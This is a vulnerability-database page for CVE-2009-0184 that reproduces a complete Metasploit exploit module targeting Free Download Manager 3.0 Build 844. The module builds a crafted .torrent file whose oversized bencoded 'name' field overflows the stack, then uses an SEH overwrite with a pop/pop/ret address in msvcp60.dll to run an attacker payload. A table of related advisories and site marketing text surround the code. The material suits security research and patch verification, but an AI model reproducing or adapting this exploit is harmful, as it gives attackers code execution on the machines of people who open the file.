Vulners
Lucene search
Free Download Manager Torrent File Parsing Multiple Remote BOF
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | CVE-2009-0184 | 3 Feb 200919:30 | – | attackerkb |
 | CVE-2009-0184 | 11 Nov 200900:00 | – | circl |
 | Free Download Manager Torrent File Parsing Multiple Buffer Overflows (CVE-2009-0184) | 27 Apr 201000:00 | – | checkpoint_advisories |
 | CVE-2009-0184 | 3 Feb 200919:00 | – | cve |
 | CVE-2009-0184 | 3 Feb 200919:00 | – | cvelist |
 | Free Download Manager - '.Torrent' File Parsing Multiple Buffer Overflow Vulnerabilities (Metasploit) | 11 Nov 200900:00 | – | exploitdb |
| Free Download Manager 3.0 Build 844 - Torrent Parsing Buffer Overflow (Metasploit) | 25 Sep 201000:00 | – | exploitdb |
 | Free Download Manager - .Torrent File Parsing Multiple Buffer Overflow Vulnerabilities (Metasploit) | 11 Nov 200900:00 | – | exploitpack |
 | Free Download Manager Torrent Parsing Buffer Overflow | 10 Nov 200921:52 | – | metasploit |
 | CVE-2009-0184 | 3 Feb 200919:30 | – | nvd |
10
==========================================================================================
Free Download Manager Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities
==========================================================================================
# Title: Free Download Manager Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Carsten Eiram
# Published: 2009-11-11
# Verified: yes
view source
print?
##
# $Id: fdm_torrent.rb 7455 2009-11-10 21:52:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Free Download Manager Torrent Parsing Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Free Download Manager
3.0 Build 844. Arbitrary code execution could occur when parsing a
specially crafted torrent file.
},
'License' => MSF_LICENSE,
'Author' => 'jduck',
'Version' => '$Revision: 7455 $',
'References' =>
[
[ 'CVE', '2009-0184' ],
[ 'OSVDB', '54033' ],
[ 'BID', '33555' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 1024,
'DisableNops' => 'True',
'BadChars' => "\x00",
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Free Download Manager 3.0 (Build 844)',
{
'Ret' => 0x7605112c # pop/pop/ret @ msvcp60.dll
}
],
],
'Privileged' => false,
'DisclosureDate' => 'February 2 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.torrent']),
], self.class)
end
def exploit
x = ""
bof = rand_text_alphanumeric(10004) + generate_seh_payload(target.ret)
# hit the end of the stack...
bof << rand_text(20000)
len = rand(10*1024*1024)
info_hash = {
'length' => len,
'name' => bof,
'piece length' => len + rand(262144 - len),
'pieces' => rand_text(20),
}
ann_hash = {
'info' => info_hash,
}
encoded = bencode_hash(ann_hash)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(encoded)
end
# bencoding functions:
#
# http://wiki.theory.org/BitTorrentSpecification
#
def bencode_string(str)
ret = "%d:" % str.length
ret << str
return ret
end
def bencode_int(int)
ret = "i%de" % int
return ret
end
def bencode_item(item)
case item
when Fixnum
return bencode_int(item)
when String
return bencode_string(item)
when Hash
return bencode_hash(item)
else
throw("unsupported bencode data type! " + item.testzt)
end
end
def bencode_list(list)
ret = "l"
list.each do |el|
ret << bencode_item(el)
end
ret << "e"
return ret
end
def bencode_hash(hash)
ret = "d"
hash.keys.sort.each do |k|
ret << bencode_item(k)
ret << bencode_item(hash[k])
end
ret << "e"
return ret
end
end
# 0day.today [2018-04-12] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Nov 2009 00:00Current
6.8Medium risk
Vulners AI Score6.8
EPSS0.65689